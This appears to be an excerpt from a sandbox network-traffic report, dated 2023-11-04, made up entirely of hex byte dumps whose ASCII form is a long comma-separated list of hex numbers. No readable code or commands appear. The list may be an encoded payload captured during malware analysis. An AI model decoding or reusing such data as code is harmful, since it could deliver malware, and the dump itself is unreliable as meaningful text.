                                                    2023-11-04 00:30:16 UTC97INData Raw: 2c 62 66 2c 37 38 2c 34 35 2c 64 31 2c 31 31 62 2c 31 33 31 2c 31 32 39 2c 39 66 2c 34 36 2c 33 38 2c 62 38 2c 38 35 2c 39 39 2c 31 33 37 2c 36 61 2c 31 34 64 2c 31 36 62 2c 31 34 62 2c 61 62 2c 66 36 2c 61 32 2c 37 65 2c 65 63 2c 31 32 62 2c 61 63 2c 34 62 2c 64 65 2c 35 62 2c 31 35 35 2c 35 63 2c 31 35 62 2c 31 34 32 2c 31 33 33 2c 39 30 2c 39 65 2c 31 31 34 2c 65 65 2c 31 35 34 2c 62 61 2c 65 33 2c 31 33 32 2c 62 62 2c 31 32 35 2c 38 30 2c 39 39 2c 64 61 2c 61 36 2c 35 61 2c 66 31 2c 31 34 32 2c 63 37 2c 37 64 2c 31 33 63 2c 62 66 2c 63 30 2c 36 32 2c 33 38 2c 63 66 2c 62 34 2c 36 32 2c 66 36 2c 39 30 2c 31 36 62 2c 31 32 62 2c 36 38 2c 38 62 2c 34 31 2c 35 31 2c 31 34 65 2c 35 64 2c 66 30 2c 35 65 2c 63 66 2c 37 64 2c 31 32 64 2c 66 62 2c 38 39 2c 35
                                                    Data Ascii: ,bf,78,45,d1,11b,131,129,9f,46,38,b8,85,99,137,6a,14d,16b,14b,ab,f6,a2,7e,ec,12b,ac,4b,de,5b,155,5c,15b,142,133,90,9e,114,ee,154,ba,e3,132,bb,125,80,99,da,a6,5a,f1,142,c7,7d,13c,bf,c0,62,38,cf,b4,62,f6,90,16b,12b,68,8b,41,51,14e,5d,f0,5e,cf,7d,12d,fb,89,5
                                                    2023-11-04 00:30:16 UTC100INData Raw: 31 34 32 2c 33 38 2c 38 66 2c 31 35 38 2c 31 31 33 2c 63 35 2c 33 31 2c 34 65 2c 63 35 2c 64 35 2c 39 37 2c 31 34 66 2c 31 31 62 2c 39 66 2c 31 36 33 2c 31 36 30 2c 31 33 37 2c 31 34 33 2c 31 37 33 2c 31 34 32 2c 37 36 2c 34 62 2c 37 37 2c 34 33 2c 62 66 2c 37 37 2c 31 32 35 2c 31 33 39 2c 31 34 35 2c 63 65 2c 36 35 2c 35 38 2c 31 30 39 2c 61 32 2c 33 64 2c 31 35 38 2c 31 30 37 2c 62 63 2c 33 31 2c 34 65 2c 63 35 2c 31 30 66 2c 64 64 2c 31 36 61 2c 61 39 2c 65 35 2c 31 35 33 2c 62 38 2c 63 33 2c 62 39 2c 37 63 2c 64 64 2c 31 36 62 2c 31 32 62 2c 38 36 2c 63 61 2c 64 35 2c 33 32 2c 34 31 2c 35 31 2c 62 36 2c 61 63 2c 66 30 2c 39 35 2c 39 61 2c 31 32 38 2c 37 61 2c 37 30 2c 63 36 2c 38 63 2c 39 64 2c 31 31 34 2c 62 33 2c 34 63 2c 35 32 2c 65 30 2c 36 63 2c
                                                    Data Ascii: 142,38,8f,158,113,c5,31,4e,c5,d5,97,14f,11b,9f,163,160,137,143,173,142,76,4b,77,43,bf,77,125,139,145,ce,65,58,109,a2,3d,158,107,bc,31,4e,c5,10f,dd,16a,a9,e5,153,b8,c3,b9,7c,dd,16b,12b,86,ca,d5,32,41,51,b6,ac,f0,95,9a,128,7a,70,c6,8c,9d,114,b3,4c,52,e0,6c,
                                                    2023-11-04 00:30:16 UTC104INData Raw: 37 65 2c 31 32 35 2c 61 36 2c 35 30 2c 64 63 2c 31 32 34 2c 64 38 2c 64 64 2c 35 63 2c 34 36 2c 61 64 2c 31 32 61 2c 63 65 2c 61 30 2c 31 33 38 2c 39 35 2c 64 31 2c 36 63 2c 34 63 2c 64 64 2c 62 39 2c 35 38 2c 65 33 2c 61 66 2c 36 36 2c 31 32 33 2c 31 31 36 2c 66 66 2c 31 35 39 2c 63 32 2c 64 36 2c 31 36 33 2c 63 36 2c 31 32 30 2c 34 61 2c 65 32 2c 65 31 2c 31 31 37 2c 39 63 2c 36 35 2c 64 62 2c 61 62 2c 31 32 30 2c 33 39 2c 66 64 2c 39 30 2c 31 33 37 2c 36 34 2c 31 30 66 2c 66 37 2c 39 39 2c 35 61 2c 66 34 2c 39 39 2c 31 34 61 2c 66 32 2c 61 37 2c 34 34 2c 63 64 2c 62 39 2c 31 34 65 2c 66 38 2c 39 30 2c 38 62 2c 38 33 2c 66 62 2c 37 37 2c 31 32 64 2c 31 31 66 2c 65 38 2c 39 35 2c 36 35 2c 65 31 2c 39 33 2c 31 33 30 2c 63 32 2c 62 35 2c 31 33 66 2c 62 33
                                                    Data Ascii: 7e,125,a6,50,dc,124,d8,dd,5c,46,ad,12a,ce,a0,138,95,d1,6c,4c,dd,b9,58,e3,af,66,123,116,ff,159,c2,d6,163,c6,120,4a,e2,e1,117,9c,65,db,ab,120,39,fd,90,137,64,10f,f7,99,5a,f4,99,14a,f2,a7,44,cd,b9,14e,f8,90,8b,83,fb,77,12d,11f,e8,95,65,e1,93,130,c2,b5,13f,b3
                                                    2023-11-04 00:30:16 UTC108INData Raw: 36 36 2c 35 32 2c 64 34 2c 33 38 2c 35 31 2c 36 63 2c 34 63 2c 36 31 2c 31 32 31 2c 63 34 2c 36 35 2c 37 36 2c 31 31 38 2c 39 31 2c 34 66 2c 39 66 2c 31 34 64 2c 65 31 2c 35 63 2c 61 61 2c 31 31 65 2c 62 39 2c 31 32 38 2c 35 30 2c 66 30 2c 31 32 36 2c 65 32 2c 63 31 2c 37 33 2c 31 34 35 2c 63 33 2c 31 32 63 2c 31 35 62 2c 34 35 2c 38 32 2c 31 32 37 2c 64 33 2c 31 36 32 2c 35 62 2c 64 37 2c 31 34 64 2c 35 36 2c 35 61 2c 36 37 2c 65 64 2c 61 38 2c 35 30 2c 61 66 2c 63 62 2c 37 39 2c 62 66 2c 66 35 2c 35 32 2c 65 61 2c 61 32 2c 34 64 2c 36 30 2c 31 31 39 2c 61 65 2c 37 31 2c 38 33 2c 31 33 39 2c 61 63 2c 34 65 2c 61 33 2c 31 31 65 2c 64 34 2c 31 32 37 2c 35 64 2c 31 30 62 2c 31 30 66 2c 64 66 2c 63 37 2c 36 66 2c 31 35 39 2c 66 32 2c 31 35 35 2c 62 64 2c 31
                                                    Data Ascii: 66,52,d4,38,51,6c,4c,61,121,c4,65,76,118,91,4f,9f,14d,e1,5c,aa,11e,b9,128,50,f0,126,e2,c1,73,145,c3,12c,15b,45,82,127,d3,162,5b,d7,14d,56,5a,67,ed,a8,50,af,cb,79,bf,f5,52,ea,a2,4d,60,119,ae,71,83,139,ac,4e,a3,11e,d4,127,5d,10b,10f,df,c7,6f,159,f2,155,bd,1
                                                    2023-11-04 00:30:16 UTC112INData Raw: 34 37 2c 37 32 2c 64 61 2c 37 34 2c 31 35 36 2c 31 34 35 2c 31 33 37 2c 34 38 2c 31 32 36 2c 62 33 2c 31 34 31 2c 34 30 2c 31 30 34 2c 62 64 2c 31 33 65 2c 37 64 2c 31 35 64 2c 63 38 2c 36 66 2c 39 61 2c 31 33 34 2c 62 64 2c 31 33 61 2c 38 33 2c 66 39 2c 31 32 66 2c 64 38 2c 63 62 2c 35 35 2c 31 33 33 2c 62 64 2c 31 33 33 2c 64 36 2c 31 35 39 2c 36 34 2c 65 61 2c 31 34 36 2c 31 34 33 2c 31 33 37 2c 31 33 38 2c 37 66 2c 66 39 2c 62 66 2c 31 32 34 2c 35 64 2c 31 32 32 2c 39 64 2c 31 34 35 2c 39 36 2c 31 34 36 2c 63 65 2c 37 38 2c 39 35 2c 31 30 61 2c 63 39 2c 31 36 61 2c 36 39 2c 31 30 63 2c 31 30 64 2c 31 30 34 2c 39 37 2c 34 36 2c 31 33 31 2c 63 63 2c 31 34 33 2c 31 34 65 2c 35 37 2c 39 38 2c 31 34 65 2c 63 62 2c 31 32 65 2c 34 38 2c 66 35 2c 31 30 63 2c
                                                    Data Ascii: 47,72,da,74,156,145,137,48,126,b3,141,40,104,bd,13e,7d,15d,c8,6f,9a,134,bd,13a,83,f9,12f,d8,cb,55,133,bd,133,d6,159,64,ea,146,143,137,138,7f,f9,bf,124,5d,122,9d,145,96,146,ce,78,95,10a,c9,16a,69,10c,10d,104,97,46,131,cc,143,14e,57,98,14e,cb,12e,48,f5,10c,
                                                    2023-11-04 00:30:16 UTC117INData Raw: 66 2c 31 34 61 2c 31 30 32 2c 31 33 35 2c 62 39 2c 31 32 38 2c 35 30 2c 64 36 2c 39 34 2c 31 34 65 2c 31 36 34 2c 31 35 37 2c 35 35 2c 65 65 2c 61 39 2c 31 36 38 2c 35 32 2c 31 30 35 2c 38 32 2c 31 34 36 2c 39 37 2c 31 33 65 2c 63 36 2c 38 30 2c 38 37 2c 31 32 63 2c 65 63 2c 31 35 38 2c 34 37 2c 65 33 2c 31 33 36 2c 65 37 2c 63 31 2c 35 64 2c 31 37 36 2c 63 65 2c 31 32 36 2c 62 37 2c 31 33 37 2c 36 30 2c 65 38 2c 36 35 2c 31 35 65 2c 31 35 37 2c 31 34 35 2c 34 37 2c 65 66 2c 65 30 2c 31 33 63 2c 35 65 2c 65 37 2c 39 66 2c 31 36 35 2c 37 37 2c 31 34 34 2c 64 66 2c 36 39 2c 38 64 2c 31 33 39 2c 65 37 2c 31 32 65 2c 35 33 2c 31 31 33 2c 31 31 63 2c 66 61 2c 39 66 2c 38 39 2c 31 34 32 2c 62 66 2c 31 32 34 2c 63 36 2c 31 34 37 2c 37 32 2c 64 61 2c 31 35 34 2c
                                                    Data Ascii: f,14a,102,135,b9,128,50,d6,94,14e,164,157,55,ee,a9,168,52,105,82,146,97,13e,c6,80,87,12c,ec,158,47,e3,136,e7,c1,5d,176,ce,126,b7,137,60,e8,65,15e,157,145,47,ef,e0,13c,5e,e7,9f,165,77,144,df,69,8d,139,e7,12e,53,113,11c,fa,9f,89,142,bf,124,c6,147,72,da,154,
                                                    2023-11-04 00:30:16 UTC121INData Raw: 65 2c 64 37 2c 31 36 31 2c 36 33 2c 66 39 2c 31 32 39 2c 65 66 2c 38 63 2c 35 36 2c 31 37 33 2c 65 35 2c 31 35 66 2c 64 30 2c 31 36 64 2c 35 32 2c 62 39 2c 38 36 2c 31 33 35 2c 31 35 30 2c 31 36 32 2c 36 34 2c 31 31 62 2c 63 38 2c 31 34 33 2c 34 37 2c 65 66 2c 63 31 2c 31 34 30 2c 37 61 2c 31 32 33 2c 63 32 2c 37 64 2c 37 66 2c 31 32 34 2c 66 30 2c 31 34 61 2c 36 39 2c 31 30 36 2c 31 32 34 2c 63 35 2c 39 38 2c 38 36 2c 31 35 39 2c 66 38 2c 31 33 64 2c 31 36 32 2c 34 35 2c 36 37 2c 31 32 38 2c 63 36 2c 31 34 37 2c 37 32 2c 64 61 2c 39 34 2c 31 34 63 2c 31 34 35 2c 31 33 37 2c 39 66 2c 66 62 2c 39 33 2c 31 34 64 2c 39 37 2c 38 39 2c 62 64 2c 31 34 61 2c 36 31 2c 65 66 2c 31 34 38 2c 31 35 31 2c 31 36 36 2c 31 36 31 2c 34 37 2c 66 61 2c 63 35 2c 31 35 38 2c
                                                    Data Ascii: e,d7,161,63,f9,129,ef,8c,56,173,e5,15f,d0,16d,52,b9,86,135,150,162,64,11b,c8,143,47,ef,c1,140,7a,123,c2,7d,7f,124,f0,14a,69,106,124,c5,98,86,159,f8,13d,162,45,67,128,c6,147,72,da,94,14c,145,137,9f,fb,93,14d,97,89,bd,14a,61,ef,148,151,166,161,47,fa,c5,158,
                                                    2023-11-04 00:30:16 UTC125INData Raw: 66 2c 65 32 2c 31 31 31 2c 62 65 2c 61 32 2c 37 65 2c 31 34 62 2c 64 64 2c 31 32 64 2c 64 39 2c 31 31 61 2c 37 36 2c 65 37 2c 65 33 2c 34 34 2c 37 34 2c 35 61 2c 37 63 2c 31 30 31 2c 62 38 2c 34 36 2c 34 33 2c 65 38 2c 38 66 2c 35 34 2c 38 65 2c 31 31 36 2c 37 34 2c 64 63 2c 65 31 2c 33 38 2c 33 39 2c 37 30 2c 37 36 2c 31 31 38 2c 62 36 2c 31 30 65 2c 37 62 2c 65 62 2c 31 31 33 2c 66 38 2c 61 30 2c 36 33 2c 31 36 36 2c 65 64 2c 66 39 2c 31 32 64 2c 66 64 2c 35 61 2c 36 64 2c 34 62 2c 31 30 32 2c 39 30 2c 33 63 2c 62 64 2c 62 36 2c 35 64 2c 37 32 2c 31 30 62 2c 36 36 2c 36 37 2c 66 63 2c 34 65 2c 36 34 2c 31 33 32 2c 62 37 2c 36 30 2c 36 34 2c 31 32 30 2c 66 31 2c 31 30 63 2c 36 31 2c 31 30 61 2c 31 31 36 2c 65 37 2c 62 62 2c 37 34 2c 31 33 37 2c 63 66 2c
                                                    Data Ascii: f,e2,111,be,a2,7e,14b,dd,12d,d9,11a,76,e7,e3,44,74,5a,7c,101,b8,46,43,e8,8f,54,8e,116,74,dc,e1,38,39,70,76,118,b6,10e,7b,eb,113,f8,a0,63,166,ed,f9,12d,fd,5a,6d,4b,102,90,3c,bd,b6,5d,72,10b,66,67,fc,4e,64,132,b7,60,64,120,f1,10c,61,10a,116,e7,bb,74,137,cf,
                                                    2023-11-04 00:30:16 UTC129INData Raw: 2c 62 61 2c 61 63 2c 62 63 2c 61 66 2c 39 64 2c 31 32 30 2c 63 62 2c 31 36 66 2c 31 34 32 2c 31 34 65 2c 62 34 2c 31 31 32 2c 38 30 2c 64 37 2c 31 31 38 2c 31 35 36 2c 39 39 2c 39 33 2c 65 34 2c 37 32 2c 61 63 2c 35 61 2c 61 64 2c 63 66 2c 37 39 2c 62 64 2c 38 38 2c 39 39 2c 31 33 33 2c 61 37 2c 35 31 2c 31 35 30 2c 64 38 2c 35 64 2c 31 34 64 2c 64 36 2c 37 66 2c 33 38 2c 33 39 2c 66 33 2c 31 30 37 2c 35 62 2c 31 31 63 2c 31 30 66 2c 31 36 62 2c 63 31 2c 35 65 2c 63 32 2c 31 35 33 2c 63 66 2c 36 66 2c 31 34 61 2c 63 35 2c 31 32 30 2c 31 37 33 2c 31 35 39 2c 66 30 2c 31 30 66 2c 38 33 2c 37 63 2c 62 31 2c 34 32 2c 62 35 2c 31 30 37 2c 39 63 2c 63 61 2c 37 31 2c 63 62 2c 35 34 2c 31 32 30 2c 31 31 38 2c 39 65 2c 34 33 2c 34 66 2c 39 62 2c 37 30 2c 63 35 2c
                                                    Data Ascii: ,ba,ac,bc,af,9d,120,cb,16f,142,14e,b4,112,80,d7,118,156,99,93,e4,72,ac,5a,ad,cf,79,bd,88,99,133,a7,51,150,d8,5d,14d,d6,7f,38,39,f3,107,5b,11c,10f,16b,c1,5e,c2,153,cf,6f,14a,c5,120,173,159,f0,10f,83,7c,b1,42,b5,107,9c,ca,71,cb,54,120,118,9e,43,4f,9b,70,c5,
                                                    2023-11-04 00:30:16 UTC132INData Raw: 36 62 2c 66 39 2c 66 62 2c 62 38 2c 35 62 2c 36 63 2c 31 34 35 2c 37 62 2c 65 31 2c 31 31 32 2c 61 36 2c 31 31 62 2c 63 66 2c 38 37 2c 31 34 61 2c 38 39 2c 36 66 2c 37 34 2c 35 61 2c 31 33 34 2c 34 62 2c 38 64 2c 34 33 2c 33 34 2c 33 32 2c 39 38 2c 61 38 2c 62 61 2c 61 63 2c 62 63 2c 31 34 30 2c 66 61 2c 31 33 33 2c 31 33 38 2c 31 36 66 2c 63 36 2c 31 31 33 2c 34 35 2c 64 31 2c 31 33 34 2c 31 34 62 2c 31 33 62 2c 31 32 37 2c 35 34 2c 35 61 2c 36 37 2c 62 38 2c 31 32 30 2c 31 30 30 2c 37 66 2c 35 61 2c 36 64 2c 61 34 2c 31 30 30 2c 63 30 2c 31 33 30 2c 31 32 38 2c 38 37 2c 35 64 2c 61 33 2c 63 61 2c 64 63 2c 61 65 2c 31 32 65 2c 64 32 2c 61 65 2c 37 30 2c 34 33 2c 61 38 2c 62 34 2c 31 34 36 2c 31 36 62 2c 63 30 2c 36 64 2c 65 65 2c 31 34 63 2c 31 35 38 2c
                                                    Data Ascii: 6b,f9,fb,b8,5b,6c,145,7b,e1,112,a6,11b,cf,87,14a,89,6f,74,5a,134,4b,8d,43,34,32,98,a8,ba,ac,bc,140,fa,133,138,16f,c6,113,45,d1,134,14b,13b,127,54,5a,67,b8,120,100,7f,5a,6d,a4,100,c0,130,128,87,5d,a3,ca,dc,ae,12e,d2,ae,70,43,a8,b4,146,16b,c0,6d,ee,14c,158,
                                                    2023-11-04 00:30:16 UTC136INData Raw: 32 2c 31 33 61 2c 34 65 2c 63 66 2c 62 61 2c 35 38 2c 35 61 2c 36 66 2c 35 34 2c 35 61 2c 31 35 32 2c 36 62 2c 62 39 2c 31 30 64 2c 37 34 2c 35 66 2c 36 64 2c 34 62 2c 31 30 30 2c 39 31 2c 34 30 2c 62 62 2c 62 66 2c 36 39 2c 65 63 2c 39 62 2c 36 64 2c 65 31 2c 34 63 2c 63 31 2c 39 37 2c 37 34 2c 31 30 61 2c 39 34 2c 31 32 64 2c 31 34 63 2c 31 36 62 2c 31 34 62 2c 31 35 31 2c 31 35 33 2c 35 64 2c 35 61 2c 36 37 2c 36 32 2c 63 33 2c 38 39 2c 31 35 38 2c 31 34 32 2c 64 37 2c 39 39 2c 37 37 2c 34 33 2c 66 37 2c 31 33 31 2c 62 36 2c 35 39 2c 31 34 62 2c 37 38 2c 36 63 2c 35 38 2c 34 36 2c 39 31 2c 66 63 2c 66 62 2c 31 34 32 2c 61 34 2c 62 63 2c 31 33 61 2c 65 66 2c 31 33 38 2c 35 65 2c 62 65 2c 61 61 2c 62 31 2c 39 61 2c 31 36 31 2c 37 31 2c 63 31 2c 38 30 2c
                                                    Data Ascii: 2,13a,4e,cf,ba,58,5a,6f,54,5a,152,6b,b9,10d,74,5f,6d,4b,100,91,40,bb,bf,69,ec,9b,6d,e1,4c,c1,97,74,10a,94,12d,14c,16b,14b,151,153,5d,5a,67,62,c3,89,158,142,d7,99,77,43,f7,131,b6,59,14b,78,6c,58,46,91,fc,fb,142,a4,bc,13a,ef,138,5e,be,aa,b1,9a,161,71,c1,80,
                                                    2023-11-04 00:30:16 UTC140INData Raw: 63 39 2c 37 65 2c 31 34 36 2c 34 30 2c 64 30 2c 65 66 2c 34 63 2c 35 32 2c 36 62 2c 64 66 2c 31 33 38 2c 39 32 2c 31 34 31 2c 63 35 2c 38 37 2c 37 38 2c 64 64 2c 31 36 35 2c 34 66 2c 65 39 2c 62 61 2c 38 62 2c 31 31 61 2c 37 36 2c 63 66 2c 36 33 2c 35 35 2c 66 30 2c 31 35 30 2c 64 33 2c 37 62 2c 33 64 2c 63 39 2c 37 65 2c 31 34 37 2c 61 34 2c 39 36 2c 31 32 34 2c 34 63 2c 35 61 2c 36 62 2c 35 34 2c 39 35 2c 31 35 66 2c 64 35 2c 33 61 2c 63 66 2c 31 33 62 2c 35 64 2c 31 33 34 2c 38 36 2c 31 33 65 2c 62 35 2c 34 33 2c 38 32 2c 31 34 30 2c 63 36 2c 31 35 66 2c 31 33 64 2c 66 61 2c 38 37 2c 34 36 2c 33 38 2c 39 32 2c 63 39 2c 63 38 2c 31 30 66 2c 61 36 2c 36 34 2c 66 39 2c 39 33 2c 36 32 2c 61 36 2c 31 31 62 2c 63 63 2c 61 37 2c 62 32 2c 31 33 37 2c 62 39 2c
                                                    Data Ascii: c9,7e,146,40,d0,ef,4c,52,6b,df,138,92,141,c5,87,78,dd,165,4f,e9,ba,8b,11a,76,cf,63,55,f0,150,d3,7b,3d,c9,7e,147,a4,96,124,4c,5a,6b,54,95,15f,d5,3a,cf,13b,5d,134,86,13e,b5,43,82,140,c6,15f,13d,fa,87,46,38,92,c9,c8,10f,a6,64,f9,93,62,a6,11b,cc,a7,b2,137,b9,
                                                    2023-11-04 00:30:16 UTC144INData Raw: 61 38 2c 31 33 30 2c 33 32 2c 39 31 2c 31 35 30 2c 64 34 2c 36 64 2c 31 34 64 2c 62 33 2c 31 31 32 2c 31 33 37 2c 31 33 38 2c 31 33 37 2c 38 38 2c 31 34 62 2c 31 32 66 2c 31 34 64 2c 31 36 62 2c 31 34 62 2c 31 33 61 2c 64 65 2c 39 38 2c 35 61 2c 36 37 2c 31 32 35 2c 36 62 2c 31 30 34 2c 61 63 2c 39 66 2c 37 39 2c 35 61 2c 31 30 63 2c 31 30 33 2c 66 37 2c 62 64 2c 61 36 2c 31 33 39 2c 31 34 62 2c 66 36 2c 62 37 2c 35 38 2c 34 36 2c 31 30 34 2c 63 34 2c 31 36 66 2c 39 38 2c 64 61 2c 31 31 64 2c 64 39 2c 62 39 2c 35 38 2c 64 64 2c 36 63 2c 61 61 2c 65 35 2c 64 63 2c 36 61 2c 33 62 2c 31 30 61 2c 66 37 2c 64 33 2c 37 31 2c 34 62 2c 66 33 2c 35 33 2c 62 66 2c 38 33 2c 34 35 2c 64 63 2c 61 63 2c 35 64 2c 66 30 2c 38 63 2c 37 38 2c 63 33 2c 34 35 2c 37 65 2c 34
                                                    Data Ascii: a8,130,32,91,150,d4,6d,14d,b3,112,137,138,137,88,14b,12f,14d,16b,14b,13a,de,98,5a,67,125,6b,104,ac,9f,79,5a,10c,103,f7,bd,a6,139,14b,f6,b7,58,46,104,c4,16f,98,da,11d,d9,b9,58,dd,6c,aa,e5,dc,6a,3b,10a,f7,d3,71,4b,f3,53,bf,83,45,dc,ac,5d,f0,8c,78,c3,45,7e,4
                                                    2023-11-04 00:30:16 UTC149INData Raw: 35 31 2c 31 36 61 2c 64 66 2c 61 31 2c 36 62 2c 63 61 2c 33 38 2c 34 35 2c 37 34 2c 35 61 2c 31 36 63 2c 63 30 2c 39 33 2c 38 33 2c 31 33 33 2c 61 37 2c 35 35 2c 64 61 2c 61 39 2c 35 64 2c 31 36 34 2c 63 64 2c 35 32 2c 63 33 2c 38 34 2c 37 63 2c 39 39 2c 31 34 65 2c 61 36 2c 35 36 2c 31 35 34 2c 31 34 31 2c 31 34 64 2c 31 36 61 2c 31 35 33 2c 64 64 2c 31 32 62 2c 38 61 2c 62 64 2c 31 30 34 2c 65 38 2c 36 31 2c 63 33 2c 39 62 2c 31 35 66 2c 31 33 34 2c 66 61 2c 31 33 31 2c 31 34 30 2c 61 65 2c 31 32 36 2c 65 30 2c 31 36 34 2c 61 64 2c 64 31 2c 31 32 34 2c 38 61 2c 63 31 2c 39 39 2c 64 61 2c 61 36 2c 35 36 2c 65 64 2c 38 61 2c 35 35 2c 36 62 2c 35 34 2c 64 61 2c 37 36 2c 65 36 2c 31 31 32 2c 34 34 2c 37 34 2c 35 61 2c 63 34 2c 31 33 33 2c 31 30 39 2c 38 64
                                                    Data Ascii: 51,16a,df,a1,6b,ca,38,45,74,5a,16c,c0,93,83,133,a7,55,da,a9,5d,164,cd,52,c3,84,7c,99,14e,a6,56,154,141,14d,16a,153,dd,12b,8a,bd,104,e8,61,c3,9b,15f,134,fa,131,140,ae,126,e0,164,ad,d1,124,8a,c1,99,da,a6,56,ed,8a,55,6b,54,da,76,e6,112,44,74,5a,c4,133,109,8d
                                                    2023-11-04 00:30:16 UTC153INData Raw: 65 35 2c 37 35 2c 64 32 2c 61 61 2c 35 65 2c 36 66 2c 62 65 2c 37 65 2c 61 34 2c 61 64 2c 36 65 2c 64 64 2c 38 39 2c 63 33 2c 39 35 2c 39 30 2c 65 35 2c 62 66 2c 35 33 2c 66 63 2c 31 31 35 2c 61 38 2c 34 66 2c 35 30 2c 31 30 37 2c 64 38 2c 37 39 2c 62 62 2c 31 35 37 2c 62 62 2c 35 38 2c 31 33 38 2c 65 35 2c 35 66 2c 39 66 2c 31 33 30 2c 63 33 2c 38 30 2c 31 34 62 2c 63 37 2c 37 62 2c 31 35 33 2c 63 66 2c 37 33 2c 62 33 2c 31 33 37 2c 31 31 36 2c 66 37 2c 31 31 65 2c 38 64 2c 31 33 36 2c 39 36 2c 31 34 32 2c 61 39 2c 35 32 2c 31 34 30 2c 63 36 2c 37 66 2c 31 35 34 2c 64 61 2c 37 63 2c 39 36 2c 31 33 37 2c 61 65 2c 38 34 2c 31 34 32 2c 63 34 2c 34 31 2c 31 34 64 2c 65 31 2c 35 38 2c 61 33 2c 31 35 33 2c 31 31 35 2c 31 35 35 2c 31 36 36 2c 31 36 31 2c 62 62
                                                    Data Ascii: e5,75,d2,aa,5e,6f,be,7e,a4,ad,6e,dd,89,c3,95,90,e5,bf,53,fc,115,a8,4f,50,107,d8,79,bb,157,bb,58,138,e5,5f,9f,130,c3,80,14b,c7,7b,153,cf,73,b3,137,116,f7,11e,8d,136,96,142,a9,52,140,c6,7f,154,da,7c,96,137,ae,84,142,c4,41,14d,e1,58,a3,153,115,155,166,161,bb
                                                    2023-11-04 00:30:16 UTC157INData Raw: 2c 36 35 2c 63 36 2c 65 63 2c 38 30 2c 37 30 2c 63 65 2c 63 66 2c 64 64 2c 34 65 2c 36 63 2c 34 63 2c 66 35 2c 31 33 37 2c 31 30 63 2c 61 31 2c 36 37 2c 31 32 35 2c 61 32 2c 34 63 2c 64 63 2c 36 61 2c 61 32 2c 38 64 2c 37 37 2c 31 32 62 2c 33 35 2c 36 37 2c 34 31 2c 35 31 2c 65 65 2c 63 61 2c 36 64 2c 64 64 2c 31 33 63 2c 34 37 2c 62 64 2c 66 64 2c 34 33 2c 34 66 2c 33 31 2c 62 38 2c 37 39 2c 31 33 34 2c 31 34 61 2c 39 34 2c 35 34 2c 35 61 2c 63 30 2c 65 35 2c 39 64 2c 31 34 30 2c 37 34 2c 65 35 2c 62 33 2c 34 66 2c 66 63 2c 31 30 33 2c 61 38 2c 34 65 2c 39 31 2c 31 35 30 2c 37 38 2c 38 31 2c 31 35 35 2c 39 39 2c 34 36 2c 62 64 2c 66 39 2c 65 35 2c 35 34 2c 64 61 2c 37 37 2c 35 32 2c 61 39 2c 31 32 34 2c 31 30 61 2c 62 32 2c 35 34 2c 63 65 2c 36 65 2c 62
                                                    Data Ascii: ,65,c6,ec,80,70,ce,cf,dd,4e,6c,4c,f5,137,10c,a1,67,125,a2,4c,dc,6a,a2,8d,77,12b,35,67,41,51,ee,ca,6d,dd,13c,47,bd,fd,43,4f,31,b8,79,134,14a,94,54,5a,c0,e5,9d,140,74,e5,b3,4f,fc,103,a8,4e,91,150,78,81,155,99,46,bd,f9,e5,54,da,77,52,a9,124,10a,b2,54,ce,6e,b
                                                    2023-11-04 00:30:16 UTC161INData Raw: 36 31 2c 31 33 37 2c 31 34 33 2c 61 66 2c 31 32 31 2c 65 30 2c 37 37 2c 63 64 2c 31 34 32 2c 65 39 2c 39 61 2c 31 34 30 2c 31 35 30 2c 31 36 32 2c 31 33 64 2c 31 34 34 2c 39 37 2c 34 36 2c 33 38 2c 39 32 2c 63 39 2c 63 38 2c 31 30 66 2c 34 30 2c 64 32 2c 31 31 63 2c 34 63 2c 35 32 2c 36 62 2c 61 61 2c 31 35 39 2c 31 31 63 2c 62 61 2c 31 33 37 2c 31 34 33 2c 31 37 33 2c 31 34 32 2c 31 33 36 2c 38 61 2c 37 37 2c 34 33 2c 38 64 2c 38 62 2c 63 36 2c 31 31 31 2c 37 32 2c 64 39 2c 66 66 2c 35 38 2c 34 36 2c 33 38 2c 62 63 2c 31 31 35 2c 38 66 2c 31 34 65 2c 31 33 30 2c 31 34 64 2c 36 63 2c 64 39 2c 64 37 2c 64 37 2c 31 35 33 2c 31 35 39 2c 31 36 36 2c 62 38 2c 38 38 2c 31 32 63 2c 31 33 30 2c 31 35 35 2c 31 36 63 2c 31 34 61 2c 64 30 2c 39 63 2c 62 39 2c 66 32
                                                    Data Ascii: 61,137,143,af,121,e0,77,cd,142,e9,9a,140,150,162,13d,144,97,46,38,92,c9,c8,10f,40,d2,11c,4c,52,6b,aa,159,11c,ba,137,143,173,142,136,8a,77,43,8d,8b,c6,111,72,d9,ff,58,46,38,bc,115,8f,14e,130,14d,6c,d9,d7,d7,153,159,166,b8,88,12c,130,155,16c,14a,d0,9c,b9,f2
                                                    2023-11-04 00:30:16 UTC164INData Raw: 2c 39 66 2c 62 64 2c 66 39 2c 65 34 2c 37 34 2c 64 61 2c 62 36 2c 61 61 2c 31 36 61 2c 31 34 62 2c 31 35 31 2c 31 36 61 2c 31 30 39 2c 63 61 2c 31 36 35 2c 31 36 31 2c 31 33 37 2c 63 64 2c 62 37 2c 61 32 2c 31 35 35 2c 61 32 2c 31 32 38 2c 31 34 32 2c 31 33 33 2c 62 64 2c 63 36 2c 61 39 2c 31 36 31 2c 31 35 34 2c 31 36 34 2c 62 31 2c 64 31 2c 63 35 2c 61 35 2c 31 36 65 2c 31 34 32 2c 31 34 65 2c 62 61 2c 34 66 2c 66 37 2c 64 31 2c 39 65 2c 31 36 39 2c 31 35 33 2c 31 35 39 2c 66 30 2c 61 38 2c 33 63 2c 31 32 64 2c 31 32 34 2c 31 35 37 2c 31 36 63 2c 31 34 61 2c 66 38 2c 31 30 30 2c 39 30 2c 31 33 30 2c 31 34 30 2c 31 35 30 2c 31 33 33 2c 31 30 62 2c 61 63 2c 35 38 2c 62 61 2c 36 35 2c 63 34 2c 62 35 2c 34 62 2c 64 32 2c 66 31 2c 35 33 2c 31 32 64 2c 31 32
                                                    Data Ascii: ,9f,bd,f9,e4,74,da,b6,aa,16a,14b,151,16a,109,ca,165,161,137,cd,b7,a2,155,a2,128,142,133,bd,c6,a9,161,154,164,b1,d1,c5,a5,16e,142,14e,ba,4f,f7,d1,9e,169,153,159,f0,a8,3c,12d,124,157,16c,14a,f8,100,90,130,140,150,133,10b,ac,58,ba,65,c4,b5,4b,d2,f1,53,12d,12
